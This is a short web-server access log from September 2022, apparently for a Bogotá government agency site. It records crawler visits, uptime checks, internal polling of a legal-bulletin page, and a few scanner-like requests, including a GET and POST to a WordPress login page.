172.22.2.4 - - [22/Sep/2022:02:56:16 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58163
216.245.221.92 - - [22/Sep/2022:03:00:14 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [22/Sep/2022:03:01:08 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
69.63.184.119 - - [22/Sep/2022:03:02:02 -0500] "GET /secretaria-de-ambiente-invita-a-comunidad-de-bosa-a-entregar-residuos-especiales-y-peligrosos.html HTTP/1.1" 206 992
172.22.2.4 - - [22/Sep/2022:03:01:16 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [22/Sep/2022:03:02:06 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56014
216.245.221.92 - - [22/Sep/2022:03:05:14 -0500] "HEAD / HTTP/1.1" 200 -
66.249.73.127 - - [22/Sep/2022:03:05:25 -0500] "-" 408 -
201.245.192.253 - - [22/Sep/2022:03:06:07 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
172.22.2.4 - - [22/Sep/2022:03:06:06 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
207.46.13.131 - - [22/Sep/2022:03:07:37 -0500] "GET /appsia/controlador HTTP/1.1" 200 4799
172.22.2.4 - - [22/Sep/2022:03:07:06 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [22/Sep/2022:03:07:57 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56014
216.245.221.92 - - [22/Sep/2022:03:10:14 -0500] "HEAD / HTTP/1.1" 200 -
159.65.20.120 - - [22/Sep/2022:03:10:24 -0500] "\x16\x03\x01" 400 226
159.65.20.120 - - [22/Sep/2022:03:10:24 -0500] "\x16\x03\x01" 400 226
159.65.20.120 - - [22/Sep/2022:03:10:25 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [22/Sep/2022:03:11:07 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
66.249.73.127 - - [22/Sep/2022:03:11:53 -0500] "-" 408 -
207.46.13.86 - - [22/Sep/2022:03:13:08 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%20301-350/00000348.tif HTTP/1.1" 200 190250
172.22.2.4 - - [22/Sep/2022:03:12:56 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [22/Sep/2022:03:15:14 -0500] "HEAD / HTTP/1.1" 200 -
84.17.45.100 - - [22/Sep/2022:03:15:22 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [22/Sep/2022:03:13:46 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60281
201.245.192.253 - - [22/Sep/2022:03:16:05 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
66.249.73.127 - - [22/Sep/2022:03:18:12 -0500] "-" 408 -
207.46.13.86 - - [22/Sep/2022:03:18:20 -0500] "GET /BLA/resoluciones/AUTOS%202022/2050.pdf HTTP/1.1" 200 379662
157.55.39.202 - - [22/Sep/2022:03:18:25 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 12497
201.245.192.253 - - [22/Sep/2022:03:19:21 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41985
201.245.192.253 - - [22/Sep/2022:03:19:24 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43565
216.245.221.92 - - [22/Sep/2022:03:20:14 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [22/Sep/2022:03:18:46 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [22/Sep/2022:03:21:04 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
172.22.2.4 - - [22/Sep/2022:03:19:36 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58163
66.249.73.127 - - [22/Sep/2022:03:24:50 -0500] "-" 408 -
216.245.221.92 - - [22/Sep/2022:03:25:14 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [22/Sep/2022:03:26:03 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
172.22.2.4 - - [22/Sep/2022:03:24:36 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
157.55.39.25 - - [22/Sep/2022:03:26:25 -0500] "GET /bla/resoluciones/autos%202021/5778.pdf HTTP/1.1" 200 343364
157.55.39.25 - - [22/Sep/2022:03:26:26 -0500] "GET /BLA/resoluciones/00000324.tif HTTP/1.1" 404 1018
172.22.2.4 - - [22/Sep/2022:03:25:27 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59828
201.245.192.253 - - [22/Sep/2022:03:29:20 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41985
201.245.192.253 - - [22/Sep/2022:03:29:24 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43565
216.245.221.92 - - [22/Sep/2022:03:30:14 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [22/Sep/2022:03:31:02 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 37989
185.119.81.102 - - [22/Sep/2022:03:31:10 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.102 - - [22/Sep/2022:03:31:11 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3605
172.22.2.4 - - [22/Sep/2022:03:30:26 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.73.127 - - [22/Sep/2022:03:32:34 -0500] "-" 408 -
